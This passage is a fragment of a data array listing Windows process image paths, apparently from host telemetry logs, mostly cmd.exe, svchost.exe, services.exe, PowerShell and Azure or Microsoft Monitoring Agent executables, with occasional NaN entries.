"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"NaN\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.